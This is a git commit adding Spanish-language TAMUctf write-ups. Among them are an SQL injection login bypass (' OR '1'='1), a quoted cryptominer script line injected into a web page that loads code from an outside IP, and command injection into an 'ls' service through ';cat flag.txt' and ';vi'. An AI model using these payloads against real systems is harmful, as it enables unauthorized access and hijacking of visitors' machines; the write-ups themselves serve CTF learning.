Agregar writeups TAMU
This commit is contained in:
@@ -0,0 +1,33 @@
|
||||
# Not Another SQLi Challenge
|
||||
|
||||
---
|
||||
|
||||
(web 100)
|
||||
|
||||

|
||||
|
||||
## Desarrollo
|
||||
|
||||
Para este problema se realizó una inyección SQL a un portal de login, se
|
||||
supuso que la consulta a la base de datos era de las más comunmente empleada,
|
||||
y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
|
||||
|
||||
```sql
|
||||
SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
|
||||
```
|
||||
|
||||
Bastaba con formular una oración como la siguiente:
|
||||
|
||||
```sql
|
||||
SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
|
||||
```
|
||||
Bastó con llenar los campos de la siguiente manera:
|
||||
|
||||
Usuario: root
|
||||
Paswwrod: ' OR '1'='1
|
||||
|
||||
Así se obtuvo la flag:
|
||||
|
||||
```
|
||||
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!
|
||||
```
|
||||
@@ -0,0 +1,21 @@
|
||||
#
|
||||
|
||||
---
|
||||
|
||||
(100 drivebyinc)
|
||||
|
||||
Welcome to Drive By Inc. We provide all sorts of logistical solutions for our customers. Over the past few years we moved to hosting a large portion of our business on a nice looking website. Recently our customers are complaining that the front page of our website is causing their computers to run extremely slowly. We hope that it is just because we added too much javascript but can you take a look for us just to make sure?
|
||||
|
||||
What is the full malicious line? (Including any HTML tags)
|
||||
|
||||
|
||||
## Desarrollo
|
||||
|
||||
Revisando el código del sitio web se contró una llmada muy peculiar:
|
||||
|
||||
```html
|
||||
<script src = http://10.187.195.95/js/colorbox.min.js></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>
|
||||
```
|
||||
|
||||
Realizando una búsqueda se encontró que CoinHive es un Minero, y la linea anterior realizaba una llamada a la API de éste minero, se ingresó la línea como flag.
|
||||
|
||||
@@ -0,0 +1,11 @@
|
||||
#
|
||||
|
||||
()
|
||||
|
||||
## Desarrollo
|
||||
|
||||
|
||||
|
||||
```
|
||||
```
|
||||
|
||||
@@ -0,0 +1,29 @@
|
||||
# Pwn4
|
||||
|
||||
---
|
||||
|
||||
(pwn 100)
|
||||
|
||||
```sh
|
||||
nc pwn.tamuctf.com 4324
|
||||
```
|
||||
|
||||
## Desarrollo
|
||||
|
||||
Después de ingresar al servidor nos encontramos una aplicación similar al
|
||||
binario `ls`, mostraba el siguiente mensaje:
|
||||
|
||||
```sh
|
||||
ls as a service (laas)(Copyright pending)
|
||||
Enter the arguments you would like to pass to ls:
|
||||
```
|
||||
|
||||
Primero intentamos usando los argumentos `*`, lo cual mostró todos los archivos
|
||||
del directorio actual, uno tenía el nombre de `flag.txt`, procedimos a leer
|
||||
sus contenidos con los argumentos `;cat flag.txt`, los cuales indican a `$SHELL`
|
||||
realizar la ejecución de `ls` y luego `cat *.txt`, así se obtuvo la flag.
|
||||
|
||||
```
|
||||
gigem{5y573m_0v3rfl0w}
|
||||
```
|
||||
|
||||
@@ -0,0 +1,37 @@
|
||||
# pwn5
|
||||
|
||||
---
|
||||
|
||||
(pwn 372)
|
||||
|
||||
```sh
|
||||
nc pwn.tamuctf.com 4325
|
||||
```
|
||||
|
||||
## Desarrollo
|
||||
|
||||
Similar a , aquí encontramos una versión _mejorada_ de la
|
||||
aplicación, al conectarnos mostró el siguiente mensaje:
|
||||
|
||||
```
|
||||
ls as a service (laas)(Copyright pending)
|
||||
Version 2: Less secret strings and more portable!
|
||||
Enter the arguments you would like to pass to ls:
|
||||
```
|
||||
|
||||
Se intentó con el mismo método del nivel anterior, pasando los argumentos
|
||||
`;cat flag.txt`, pero en esta ocasión se limitó la entrada a tres caracteres
|
||||
como argumentos.
|
||||
|
||||
Se revisó el manual de `ls`, para buscar alguna opción inusual que mostrase el
|
||||
contenido de un archivo al listar.
|
||||
|
||||
Después de pensar en métodos más elaborados se decidió pensar en comandos con
|
||||
longitud de dos letras, el primero que llegó a la mente fue el editor de texto
|
||||
`vi`, así que se pasó el argumento `;vi`, causando que se ejecutara el editor,
|
||||
luego se leyó el contenido del archivo `flag.txt` con el comando `:r flag.txt`,
|
||||
así fue como se obtuvo la flag:
|
||||
|
||||
```
|
||||
gigem{r37urn_0r13n73d_pr4c71c3}
|
||||
```
|
||||
@@ -0,0 +1,24 @@
|
||||
# How am I?
|
||||
|
||||
---
|
||||
|
||||
(100 misc)
|
||||
|
||||
What is the A record for tamuctf.com?
|
||||
(Not in standard gigem{flag} format)
|
||||
|
||||
## Desarrollo
|
||||
|
||||
Se buscó más información acerca del *A record*, se encontró que éste es un
|
||||
mapeo del DNS a la dirección IPv4. Bastó con realizar un ping al sitio:
|
||||
|
||||
```sh
|
||||
ping -c 2 tamuctf.com
|
||||
```
|
||||
|
||||
flag:
|
||||
|
||||
```
|
||||
52.33.57.247
|
||||
```
|
||||
|
||||
@@ -0,0 +1,19 @@
|
||||
# Who do I trust?
|
||||
|
||||
(100 misc)
|
||||
|
||||
Who issued the certificate to ?
|
||||
(Not in standard gigem{flag} format)
|
||||
|
||||
## Desarrollo
|
||||
|
||||
Pasamos a buscar quién fue la identidad que emitió el certificado, bastó con
|
||||
realizar un análisis con el navegador web del certificado.
|
||||
|
||||
|
||||
flag:
|
||||
|
||||
```
|
||||
DST Root CA X3
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user